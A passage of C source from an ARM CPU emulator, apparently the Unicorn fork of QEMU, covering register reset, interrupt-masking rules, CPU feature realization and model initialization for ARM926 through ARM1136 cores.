ARM_FEATURE_PMSA)) { if (cpu->pmsav7_dregion > 0) { if (arm_feature(env, ARM_FEATURE_V8)) { memset(env->pmsav8.rbar[M_REG_NS], 0, sizeof(*env->pmsav8.rbar[M_REG_NS]) * cpu->pmsav7_dregion); memset(env->pmsav8.rlar[M_REG_NS], 0, sizeof(*env->pmsav8.rlar[M_REG_NS]) * cpu->pmsav7_dregion); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { memset(env->pmsav8.rbar[M_REG_S], 0, sizeof(*env->pmsav8.rbar[M_REG_S]) * cpu->pmsav7_dregion); memset(env->pmsav8.rlar[M_REG_S], 0, sizeof(*env->pmsav8.rlar[M_REG_S]) * cpu->pmsav7_dregion); } } else if (arm_feature(env, ARM_FEATURE_V7)) { memset(env->pmsav7.drbar, 0, sizeof(*env->pmsav7.drbar) * cpu->pmsav7_dregion); memset(env->pmsav7.drsr, 0, sizeof(*env->pmsav7.drsr) * cpu->pmsav7_dregion); memset(env->pmsav7.dracr, 0, sizeof(*env->pmsav7.dracr) * cpu->pmsav7_dregion); } } env->pmsav7.rnr[M_REG_NS] = 0; env->pmsav7.rnr[M_REG_S] = 0; env->pmsav8.mair0[M_REG_NS] = 0; env->pmsav8.mair0[M_REG_S] = 0; env->pmsav8.mair1[M_REG_NS] = 0; env->pmsav8.mair1[M_REG_S] = 0; } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { if (cpu->sau_sregion > 0) { memset(env->sau.rbar, 0, sizeof(*env->sau.rbar) * cpu->sau_sregion); memset(env->sau.rlar, 0, sizeof(*env->sau.rlar) * cpu->sau_sregion); } env->sau.rnr = 0; /* SAU_CTRL reset value is IMPDEF; we choose 0, which is what * the Cortex-M33 does. */ env->sau.ctrl = 0; } set_flush_to_zero(1, &env->vfp.standard_fp_status); set_flush_inputs_to_zero(1, &env->vfp.standard_fp_status); set_default_nan_mode(1, &env->vfp.standard_fp_status); set_float_detect_tininess(float_tininess_before_rounding, &env->vfp.fp_status); set_float_detect_tininess(float_tininess_before_rounding, &env->vfp.standard_fp_status); set_float_detect_tininess(float_tininess_before_rounding, &env->vfp.fp_status_f16); hw_breakpoint_update_all(cpu); hw_watchpoint_update_all(cpu); arm_rebuild_hflags(env); } static inline bool arm_excp_unmasked(CPUState *cs, unsigned int excp_idx, unsigned int target_el, unsigned int cur_el, bool secure, uint64_t hcr_el2) { CPUARMState *env = cs->env_ptr; bool pstate_unmasked; bool unmasked = false; /* * Don't take exceptions if they target a lower EL. * This check should catch any exceptions that would not be taken * but left pending. */ if (cur_el > target_el) { return false; } switch (excp_idx) { case EXCP_FIQ: pstate_unmasked = !(env->daif & PSTATE_F); break; case EXCP_IRQ: pstate_unmasked = !(env->daif & PSTATE_I); break; case EXCP_VFIQ: if (secure || !(hcr_el2 & HCR_FMO) || (hcr_el2 & HCR_TGE)) { /* VFIQs are only taken when hypervized and non-secure. */ return false; } return !(env->daif & PSTATE_F); case EXCP_VIRQ: if (secure || !(hcr_el2 & HCR_IMO) || (hcr_el2 & HCR_TGE)) { /* VIRQs are only taken when hypervized and non-secure. */ return false; } return !(env->daif & PSTATE_I); default: g_assert_not_reached(); } /* * Use the target EL, current execution state and SCR/HCR settings to * determine whether the corresponding CPSR bit is used to mask the * interrupt. */ if ((target_el > cur_el) && (target_el != 1)) { /* Exceptions targeting a higher EL may not be maskable */ if (arm_feature(env, ARM_FEATURE_AARCH64)) { /* * 64-bit masking rules are simple: exceptions to EL3 * can't be masked, and exceptions to EL2 can only be * masked from Secure state. The HCR and SCR settings * don't affect the masking logic, only the interrupt routing. */ if (target_el == 3 || !secure) { unmasked = true; } } else { /* * The old 32-bit-only environment has a more complicated * masking setup. HCR and SCR bits not only affect interrupt * routing but also change the behaviour of masking. */ bool hcr, scr; switch (excp_idx) { case EXCP_FIQ: /* * If FIQs are routed to EL3 or EL2 then there are cases where * we override the CPSR.F in determining if the exception is * masked or not. If neither of these are set then we fall back * to the CPSR.F setting otherwise we further assess the state * below. */ hcr = hcr_el2 & HCR_FMO; scr = (env->cp15.scr_el3 & SCR_FIQ); /* * When EL3 is 32-bit, the SCR.FW bit controls whether the * CPSR.F bit masks FIQ interrupts when taken in non-secure * state. If SCR.FW is set then FIQs can be masked by CPSR.F * when non-secure but only when FIQs are only routed to EL3. */ scr = scr && !((env->cp15.scr_el3 & SCR_FW) && !hcr); break; case EXCP_IRQ: /* * When EL3 execution state is 32-bit, if HCR.IMO is set then * we may override the CPSR.I masking when in non-secure state. * The SCR.IRQ setting has already been taken into consideration * when setting the target EL, so it does not have a further * affect here. */ hcr = hcr_el2 & HCR_IMO; scr = false; break; default: g_assert_not_reached(); } if ((scr || hcr) && !secure) { unmasked = true; } } } /* * The PSTATE bits only mask the interrupt if we have not overriden the * ability above. */ return unmasked || pstate_unmasked; } bool arm_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { CPUClass *cc = CPU_GET_CLASS(cs); CPUARMState *env = cs->env_ptr; uint32_t cur_el = arm_current_el(env); bool secure = arm_is_secure(env); uint64_t hcr_el2 = arm_hcr_el2_eff(env); uint32_t target_el; uint32_t excp_idx; /* The prioritization of interrupts is IMPLEMENTATION DEFINED. */ if (interrupt_request & CPU_INTERRUPT_FIQ) { excp_idx = EXCP_FIQ; target_el = arm_phys_excp_target_el(cs, excp_idx, cur_el, secure); if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } if (interrupt_request & CPU_INTERRUPT_HARD) { excp_idx = EXCP_IRQ; target_el = arm_phys_excp_target_el(cs, excp_idx, cur_el, secure); if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } if (interrupt_request & CPU_INTERRUPT_VIRQ) { excp_idx = EXCP_VIRQ; target_el = 1; if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } if (interrupt_request & CPU_INTERRUPT_VFIQ) { excp_idx = EXCP_VFIQ; target_el = 1; if (arm_excp_unmasked(cs, excp_idx, target_el, cur_el, secure, hcr_el2)) { goto found; } } return false; found: cs->exception_index = excp_idx; env->exception.target_el = target_el; cc->do_interrupt(cs); return true; } #if !defined(TARGET_AARCH64) static bool arm_v7m_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { CPUClass *cc = CPU_GET_CLASS(cs); // ARMCPU *cpu = ARM_CPU(cs); // CPUARMState *env = &cpu->env; bool ret = false; /* ARMv7-M interrupt masking works differently than -A or -R. * There is no FIQ/IRQ distinction. Instead of I and F bits * masking FIQ and IRQ interrupts, an exception is taken only * if it is higher priority than the current execution priority * (which depends on state like BASEPRI, FAULTMASK and the * currently active exception). */ if (interrupt_request & CPU_INTERRUPT_HARD) { // && (armv7m_nvic_can_take_pending_exception(env->nvic))) { cs->exception_index = EXCP_IRQ; cc->do_interrupt(cs); ret = true; } return ret; } #endif void arm_cpu_update_virq(ARMCPU *cpu) { /* * Update the interrupt level for VIRQ, which is the logical OR of * the HCR_EL2.VI bit and the input line level from the GIC. */ CPUARMState *env = &cpu->env; CPUState *cs = CPU(cpu); bool new_state = (env->cp15.hcr_el2 & HCR_VI) || (env->irq_line_state & CPU_INTERRUPT_VIRQ); if (new_state != ((cs->interrupt_request & CPU_INTERRUPT_VIRQ) != 0)) { if (new_state) { cpu_interrupt(cs, CPU_INTERRUPT_VIRQ); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_VIRQ); } } } void arm_cpu_update_vfiq(ARMCPU *cpu) { /* * Update the interrupt level for VFIQ, which is the logical OR of * the HCR_EL2.VF bit and the input line level from the GIC. */ CPUARMState *env = &cpu->env; CPUState *cs = CPU(cpu); bool new_state = (env->cp15.hcr_el2 & HCR_VF) || (env->irq_line_state & CPU_INTERRUPT_VFIQ); if (new_state != ((cs->interrupt_request & CPU_INTERRUPT_VFIQ) != 0)) { if (new_state) { cpu_interrupt(cs, CPU_INTERRUPT_VFIQ); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_VFIQ); } } } static inline void set_feature(CPUARMState *env, int feature) { env->features |= 1ULL << feature; } static inline void unset_feature(CPUARMState *env, int feature) { env->features &= ~(1ULL << feature); } static uint64_t arm_cpu_mp_affinity(int idx, uint8_t clustersz) { uint32_t Aff1 = idx / clustersz; uint32_t Aff0 = idx % clustersz; return (Aff1 << ARM_AFF1_SHIFT) | Aff0; } static void cpreg_hashtable_data_destroy(gpointer data) { /* * Destroy function for cpu->cp_regs hashtable data entries. * We must free the name string because it was g_strdup()ed in * add_cpreg_to_hashtable(). It's OK to cast away the 'const' * from r->name because we know we definitely allocated it. */ ARMCPRegInfo *r = data; g_free((void *)r->name); g_free(r); } void arm_cpu_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); CPUARMState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); cpu->cp_regs = g_hash_table_new_full(g_int_hash, g_int_equal, g_free, cpreg_hashtable_data_destroy); QLIST_INIT(&cpu->pre_el_change_hooks); QLIST_INIT(&cpu->el_change_hooks); /* DTB consumers generally don't in fact care what the 'compatible' * string is, so always provide some string and trust that a hypothetical * picky DTB consumer will also provide a helpful error message. */ cpu->psci_version = 1; /* By default assume PSCI v0.1 */ cpu->psci_version = 2; /* TCG implements PSCI 0.2 */ } unsigned int gt_cntfrq_period_ns(ARMCPU *cpu) { /* * The exact approach to calculating guest ticks is: * * muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), cpu->gt_cntfrq_hz, * NANOSECONDS_PER_SECOND); * * We don't do that. Rather we intentionally use integer division * truncation below and in the caller for the conversion of host monotonic * time to guest ticks to provide the exact inverse for the semantics of * the QEMUTimer scale factor. QEMUTimer's scale facter is an integer, so * it loses precision when representing frequencies where * `(NANOSECONDS_PER_SECOND % cpu->gt_cntfrq) > 0` holds. Failing to * provide an exact inverse leads to scheduling timers with negative * periods, which in turn leads to sticky behaviour in the guest. * * Finally, CNTFRQ is effectively capped at 1GHz to ensure our scale factor * cannot become zero. */ return NANOSECONDS_PER_SECOND > cpu->gt_cntfrq_hz ? NANOSECONDS_PER_SECOND / cpu->gt_cntfrq_hz : 1; } void arm_cpu_post_init(CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); /* M profile implies PMSA. We have to do this here rather than * in realize with the other feature-implication checks because * we look at the PMSA bit to see if we should add some properties. */ if (arm_feature(&cpu->env, ARM_FEATURE_M)) { set_feature(&cpu->env, ARM_FEATURE_PMSA); } if (arm_feature(&cpu->env, ARM_FEATURE_CBAR) || arm_feature(&cpu->env, ARM_FEATURE_CBAR_RO)) { cpu->reset_cbar = 0; } if (!arm_feature(&cpu->env, ARM_FEATURE_M)) { cpu->reset_hivecs = false; } if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { cpu->rvbar = 0; } if (arm_feature(&cpu->env, ARM_FEATURE_EL3)) { /* Add the has_el3 state CPU property only if EL3 is allowed. This will * prevent "has_el3" from existing on CPUs which cannot support EL3. */ cpu->has_el3 = true; } if (arm_feature(&cpu->env, ARM_FEATURE_EL2)) { cpu->has_el2 = true; } if (arm_feature(&cpu->env, ARM_FEATURE_PMU)) { cpu->has_pmu = true; } /* * Allow user to turn off VFP and Neon support, but only for TCG -- * KVM does not currently allow us to lie to the guest about its * ID/feature registers, so the guest always sees what the host has. */ if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64) ? cpu_isar_feature(aa64_fp_simd, cpu) : cpu_isar_feature(aa32_vfp, cpu)) { cpu->has_vfp = true; } if (arm_feature(&cpu->env, ARM_FEATURE_NEON)) { cpu->has_neon = true; } if (arm_feature(&cpu->env, ARM_FEATURE_M) && arm_feature(&cpu->env, ARM_FEATURE_THUMB_DSP)) { cpu->has_dsp = true; } if (arm_feature(&cpu->env, ARM_FEATURE_PMSA)) { cpu->has_mpu = true; } cpu->cfgend = false; if (arm_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER)) { cpu->gt_cntfrq_hz = NANOSECONDS_PER_SECOND / GTIMER_SCALE; } } static void arm_cpu_finalize_features(ARMCPU *cpu) { #if 0 if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { arm_cpu_sve_finalize(cpu); } #endif } void arm_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); ARMCPU *cpu = ARM_CPU(dev); CPUARMState *env = &cpu->env; #ifndef NDEBUG bool no_aa32 = false; #endif #if 0 /* The NVIC and M-profile CPU are two halves of a single piece of * hardware; trying to use one without the other is a command line * error and will result in segfaults if not caught here. */ if (arm_feature(env, ARM_FEATURE_M)) { if (!env->nvic) { return; } } else { if (env->nvic) { return; } } if (arm_feature(env, ARM_FEATURE_GENERIC_TIMER)) { if (!cpu->gt_cntfrq_hz) { return; } } #endif cpu_exec_realizefn(cs); arm_cpu_finalize_features(cpu); if (arm_feature(env, ARM_FEATURE_AARCH64) && cpu->has_vfp != cpu->has_neon) { /* * This is an architectural requirement for AArch64; AArch32 is * more flexible and permits VFP-no-Neon and Neon-no-VFP. */ // error_setg(errp, "AArch64 CPUs must have both VFP and Neon or neither"); return; } if (!cpu->has_vfp) { uint64_t t; uint32_t u; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, JSCVT, 0, t); cpu->isar.id_aa64isar1 = t; t = cpu->isar.id_aa64pfr0; FIELD_DP64(t, ID_AA64PFR0, FP, 0xf, t); cpu->isar.id_aa64pfr0 = t; u = cpu->isar.id_isar6; FIELD_DP32(u, ID_ISAR6, JSCVT, 0, u); cpu->isar.id_isar6 = u; u = cpu->isar.mvfr0; FIELD_DP32(u, MVFR0, FPSP, 0, u); FIELD_DP32(u, MVFR0, FPDP, 0, u); FIELD_DP32(u, MVFR0, FPTRAP, 0, u); FIELD_DP32(u, MVFR0, FPDIVIDE, 0, u); FIELD_DP32(u, MVFR0, FPSQRT, 0, u); FIELD_DP32(u, MVFR0, FPSHVEC, 0, u); FIELD_DP32(u, MVFR0, FPROUND, 0, u); cpu->isar.mvfr0 = u; u = cpu->isar.mvfr1; FIELD_DP32(u, MVFR1, FPFTZ, 0, u); FIELD_DP32(u, MVFR1, FPDNAN, 0, u); FIELD_DP32(u, MVFR1, FPHP, 0, u); cpu->isar.mvfr1 = u; u = cpu->isar.mvfr2; FIELD_DP32(u, MVFR2, FPMISC, 0, u); cpu->isar.mvfr2 = u; } if (!cpu->has_neon) { uint64_t t; uint32_t u; unset_feature(env, ARM_FEATURE_NEON); t = cpu->isar.id_aa64isar0; FIELD_DP64(t, ID_AA64ISAR0, DP, 0, t); cpu->isar.id_aa64isar0 = t; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, FCMA, 0, t); cpu->isar.id_aa64isar1 = t; t = cpu->isar.id_aa64pfr0; FIELD_DP64(t, ID_AA64PFR0, ADVSIMD, 0xf, t); cpu->isar.id_aa64pfr0 = t; u = cpu->isar.id_isar5; FIELD_DP32(u, ID_ISAR5, RDM, 0, u); FIELD_DP32(u, ID_ISAR5, VCMA, 0, u); cpu->isar.id_isar5 = u; u = cpu->isar.id_isar6; FIELD_DP32(u, ID_ISAR6, DP, 0, u); FIELD_DP32(u, ID_ISAR6, FHM, 0, u); cpu->isar.id_isar6 = u; u = cpu->isar.mvfr1; FIELD_DP32(u, MVFR1, SIMDLS, 0, u); FIELD_DP32(u, MVFR1, SIMDINT, 0, u); FIELD_DP32(u, MVFR1, SIMDSP, 0, u); FIELD_DP32(u, MVFR1, SIMDHP, 0, u); cpu->isar.mvfr1 = u; u = cpu->isar.mvfr2; FIELD_DP32(u, MVFR2, SIMDMISC, 0, u); cpu->isar.mvfr2 = u; } if (!cpu->has_neon && !cpu->has_vfp) { uint64_t t; uint32_t u; t = cpu->isar.id_aa64isar0; FIELD_DP64(t, ID_AA64ISAR0, FHM, 0, t); cpu->isar.id_aa64isar0 = t; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, FRINTTS, 0, t); cpu->isar.id_aa64isar1 = t; u = cpu->isar.mvfr0; FIELD_DP32(u, MVFR0, SIMDREG, 0, u); cpu->isar.mvfr0 = u; /* Despite the name, this field covers both VFP and Neon */ u = cpu->isar.mvfr1; FIELD_DP32(u, MVFR1, SIMDFMAC, 0, u); cpu->isar.mvfr1 = u; } if (arm_feature(env, ARM_FEATURE_M) && !cpu->has_dsp) { uint32_t u; unset_feature(env, ARM_FEATURE_THUMB_DSP); u = cpu->isar.id_isar1; FIELD_DP32(u, ID_ISAR1, EXTEND, 1, u); cpu->isar.id_isar1 = u; u = cpu->isar.id_isar2; FIELD_DP32(u, ID_ISAR2, MULTU, 1, u); FIELD_DP32(u, ID_ISAR2, MULTS, 1, u); cpu->isar.id_isar2 = u; u = cpu->isar.id_isar3; FIELD_DP32(u, ID_ISAR3, SIMD, 1, u); FIELD_DP32(u, ID_ISAR3, SATURATE, 0, u); cpu->isar.id_isar3 = u; } /* Some features automatically imply others: */ if (arm_feature(env, ARM_FEATURE_V8)) { if (arm_feature(env, ARM_FEATURE_M)) { set_feature(env, ARM_FEATURE_V7); } else { set_feature(env, ARM_FEATURE_V7VE); } } /* * There exist AArch64 cpus without AArch32 support. When KVM * queries ID_ISAR0_EL1 on such a host, the value is UNKNOWN. * Similarly, we cannot check ID_AA64PFR0 without AArch64 support. * As a general principle, we also do not make ID register * consistency checks anywhere unless using TCG, because only * for TCG would a consistency-check failure be a QEMU bug. */ if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { #ifndef NDEBUG no_aa32 = !cpu_isar_feature(aa64_aa32, cpu); #else cpu_isar_feature(aa64_aa32, cpu); #endif } if (arm_feature(env, ARM_FEATURE_V7VE)) { /* v7 Virtualization Extensions. In real hardware this implies * EL2 and also the presence of the Security Extensions. * For QEMU, for backwards-compatibility we implement some * CPUs or CPU configs which have no actual EL2 or EL3 but do * include the various other features that V7VE implies. * Presence of EL2 itself is ARM_FEATURE_EL2, and of the * Security Extensions is ARM_FEATURE_EL3. */ #ifndef NDEBUG assert(no_aa32 || cpu_isar_feature(aa32_arm_div, cpu)); #endif set_feature(env, ARM_FEATURE_LPAE); set_feature(env, ARM_FEATURE_V7); } if (arm_feature(env, ARM_FEATURE_V7)) { set_feature(env, ARM_FEATURE_VAPA); set_feature(env, ARM_FEATURE_THUMB2); set_feature(env, ARM_FEATURE_MPIDR); if (!arm_feature(env, ARM_FEATURE_M)) { set_feature(env, ARM_FEATURE_V6K); } else { set_feature(env, ARM_FEATURE_V6); } /* Always define VBAR for V7 CPUs even if it doesn't exist in * non-EL3 configs. This is needed by some legacy boards. */ set_feature(env, ARM_FEATURE_VBAR); } if (arm_feature(env, ARM_FEATURE_V6K)) { set_feature(env, ARM_FEATURE_V6); set_feature(env, ARM_FEATURE_MVFR); } if (arm_feature(env, ARM_FEATURE_V6)) { set_feature(env, ARM_FEATURE_V5); if (!arm_feature(env, ARM_FEATURE_M)) { #ifndef NDEBUG assert(no_aa32 || cpu_isar_feature(aa32_jazelle, cpu)); #endif set_feature(env, ARM_FEATURE_AUXCR); } } if (arm_feature(env, ARM_FEATURE_V5)) { set_feature(env, ARM_FEATURE_V4T); } if (arm_feature(env, ARM_FEATURE_LPAE)) { set_feature(env, ARM_FEATURE_V7MP); set_feature(env, ARM_FEATURE_PXN); } if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { set_feature(env, ARM_FEATURE_CBAR); } if (arm_feature(env, ARM_FEATURE_THUMB2) && !arm_feature(env, ARM_FEATURE_M)) { set_feature(env, ARM_FEATURE_THUMB_DSP); } /* * We rely on no XScale CPU having VFP so we can use the same bits in the * TB flags field for VECSTRIDE and XSCALE_CPAR. */ assert(arm_feature(&cpu->env, ARM_FEATURE_AARCH64) || !cpu_isar_feature(aa32_vfp_simd, cpu) || !arm_feature(env, ARM_FEATURE_XSCALE)); #if 0 if (arm_feature(env, ARM_FEATURE_V7) && !arm_feature(env, ARM_FEATURE_M) && !arm_feature(env, ARM_FEATURE_PMSA)) { /* v7VMSA drops support for the old ARMv5 tiny pages, so we * can use 4K pages. */ pagebits = 12; } else { /* For CPUs which might have tiny 1K pages, or which have an * MPU and might have small region sizes, stick with 1K pages. */ pagebits = 10; } if (!set_preferred_target_page_bits(cpu->uc, pagebits)) { /* This can only ever happen for hotplugging a CPU, or if * the board code incorrectly creates a CPU which it has * promised via minimum_page_size that it will not. */ // error_setg(errp, "This CPU requires a smaller page size than the " // "system is using"); return; } #endif /* This cpu-id-to-MPIDR affinity is used only for TCG; KVM will override it. * We don't support setting cluster ID ([16..23]) (known as Aff2 * in later ARM ARM versions), or any of the higher affinity level fields, * so these bits always RAZ. */ if (cpu->mp_affinity == ARM64_AFFINITY_INVALID) { cpu->mp_affinity = arm_cpu_mp_affinity(cs->cpu_index, ARM_DEFAULT_CPUS_PER_CLUSTER); } if (cpu->reset_hivecs) { cpu->reset_sctlr |= (1 << 13); } if (cpu->cfgend) { if (arm_feature(&cpu->env, ARM_FEATURE_V7)) { cpu->reset_sctlr |= SCTLR_EE; } else { cpu->reset_sctlr |= SCTLR_B; } } if (!cpu->has_el3) { /* If the has_el3 CPU property is disabled then we need to disable the * feature. */ unset_feature(env, ARM_FEATURE_EL3); /* Disable the security extension feature bits in the processor feature * registers as well. These are id_pfr1[7:4] and id_aa64pfr0[15:12]. */ cpu->id_pfr1 &= ~0xf0; cpu->isar.id_aa64pfr0 &= ~0xf000; } if (!cpu->has_el2) { unset_feature(env, ARM_FEATURE_EL2); } if (!cpu->has_pmu) { unset_feature(env, ARM_FEATURE_PMU); } if (arm_feature(env, ARM_FEATURE_PMU)) { pmu_init(cpu); arm_register_pre_el_change_hook(cpu, &pmu_pre_el_change, 0); arm_register_el_change_hook(cpu, &pmu_post_el_change, 0); } else { FIELD_DP64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, PMUVER, 0, cpu->isar.id_aa64dfr0); FIELD_DP32(cpu->isar.id_dfr0, ID_DFR0, PERFMON, 0, cpu->isar.id_dfr0); cpu->pmceid0 = 0; cpu->pmceid1 = 0; } if (!arm_feature(env, ARM_FEATURE_EL2)) { /* Disable the hypervisor feature bits in the processor feature * registers if we don't have EL2. These are id_pfr1[15:12] and * id_aa64pfr0_el1[11:8]. */ cpu->isar.id_aa64pfr0 &= ~0xf00; cpu->id_pfr1 &= ~0xf000; } /* MPU can be configured out of a PMSA CPU either by setting has-mpu * to false or by setting pmsav7-dregion to 0. */ if (!cpu->has_mpu) { cpu->pmsav7_dregion = 0; } if (cpu->pmsav7_dregion == 0) { cpu->has_mpu = false; } if (arm_feature(env, ARM_FEATURE_PMSA) && arm_feature(env, ARM_FEATURE_V7)) { uint32_t nr = cpu->pmsav7_dregion; if (nr > 0xff) { // error_setg(errp, "PMSAv7 MPU #regions invalid %" PRIu32, nr); return; } if (nr) { if (arm_feature(env, ARM_FEATURE_V8)) { /* PMSAv8 */ env->pmsav8.rbar[M_REG_NS] = g_new0(uint32_t, nr); env->pmsav8.rlar[M_REG_NS] = g_new0(uint32_t, nr); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { env->pmsav8.rbar[M_REG_S] = g_new0(uint32_t, nr); env->pmsav8.rlar[M_REG_S] = g_new0(uint32_t, nr); } } else { env->pmsav7.drbar = g_new0(uint32_t, nr); env->pmsav7.drsr = g_new0(uint32_t, nr); env->pmsav7.dracr = g_new0(uint32_t, nr); } } } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { uint32_t nr = cpu->sau_sregion; if (nr > 0xff) { // error_setg(errp, "v8M SAU #regions invalid %" PRIu32, nr); return; } if (nr) { env->sau.rbar = g_new0(uint32_t, nr); env->sau.rlar = g_new0(uint32_t, nr); } } if (arm_feature(env, ARM_FEATURE_EL3)) { set_feature(env, ARM_FEATURE_VBAR); } register_cp_regs_for_features(cpu); unsigned int smp_cpus = 1; if (cpu->has_el3 || arm_feature(env, ARM_FEATURE_M_SECURITY)) { cs->num_ases = 2; if (!cpu->secure_memory) { cpu->secure_memory = cs->memory; } cpu_address_space_init(cs, ARMASIdx_S, cpu->secure_memory); } else { cs->num_ases = 1; } cpu_address_space_init(cs, ARMASIdx_NS, cs->memory); /* No core_count specified, default to smp_cpus. */ if (cpu->core_count == -1) { cpu->core_count = smp_cpus; } cpu_reset(cs); } /* CPU models. These are not needed for the AArch64 linux-user build. */ #if !defined(TARGET_AARCH64) static void arm926_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); cpu->midr = 0x41069265; cpu->reset_fpsid = 0x41011090; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00090078; /* * ARMv5 does not have the ID_ISAR registers, but we can still * set the field to indicate Jazelle support within QEMU. */ FIELD_DP32(cpu->isar.id_isar1, ID_ISAR1, JAZELLE, 1, cpu->isar.id_isar1); /* * Similarly, we need to set MVFR0 fields to enable vfp and short vector * support even though ARMv5 doesn't have this register. */ FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSHVEC, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSP, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPDP, 1, cpu->isar.mvfr0); } static void arm946_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_PMSA); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x41059461; cpu->ctr = 0x0f004006; cpu->reset_sctlr = 0x00000078; } static void arm1026_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_AUXCR); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); cpu->midr = 0x4106a262; cpu->reset_fpsid = 0x410110a0; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00090078; cpu->reset_auxcr = 1; /* * ARMv5 does not have the ID_ISAR registers, but we can still * set the field to indicate Jazelle support within QEMU. */ FIELD_DP32(cpu->isar.id_isar1, ID_ISAR1, JAZELLE, 1, cpu->isar.id_isar1); /* * Similarly, we need to set MVFR0 fields to enable vfp and short vector * support even though ARMv5 doesn't have this register. */ FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSHVEC, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSP, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPDP, 1, cpu->isar.mvfr0); { /* The 1026 had an IFAR at c6,c0,0,1 rather than the ARMv6 c6,c0,0,2 */ ARMCPRegInfo ifar = { .name = "IFAR", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.ifar_ns), .resetvalue = 0 }; define_one_arm_cp_reg(cpu, &ifar); } } static void arm1136_r2_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); /* What qemu calls "arm1136_r2" is actually the 1136 r0p2, ie an * older core than plain "arm1136". In particular this does not * have the v6K features. * These ID register values are correct for 1136 but may be wrong * for 1136_r2 (in particular r0p2 does not actually implement most * of the ID registers). */ set_feature(&cpu->env, ARM_FEATURE_V6); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); cpu->midr = 0x4107b362; cpu->reset_fpsid = 0x410120b4; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00050078; cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x1; cpu->isar.id_dfr0 = 0x2; cpu->id_afr0 = 0x3; cpu->isar.id_mmfr0 = 0x01130003; cpu->isar.id_mmfr1 = 0x10030302; cpu->isar.id_mmfr2 = 0x01222110; cpu->isar.id_isar0 = 0x00140011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11231111; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x141; cpu->reset_auxcr = 7; } static void arm1136_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6K); set_feature(&cpu->env, ARM_FEATURE_V6); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); cpu->midr = 0x4117b363; cpu->reset_fpsid = 0x410120b4; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00050078; cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x1; cpu->isar.id_dfr0 = 0x2; cpu->id_afr0 = 0x3; cpu->isar.id_mmfr0 = 0x01130003; cpu->isar.id_mmfr1 = 0x10030302; cpu->isar.id_mmfr2 = 0x01222110; cpu->isar.id_isar0 = 0x00140011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11231111; cpu->isar.id_isar3 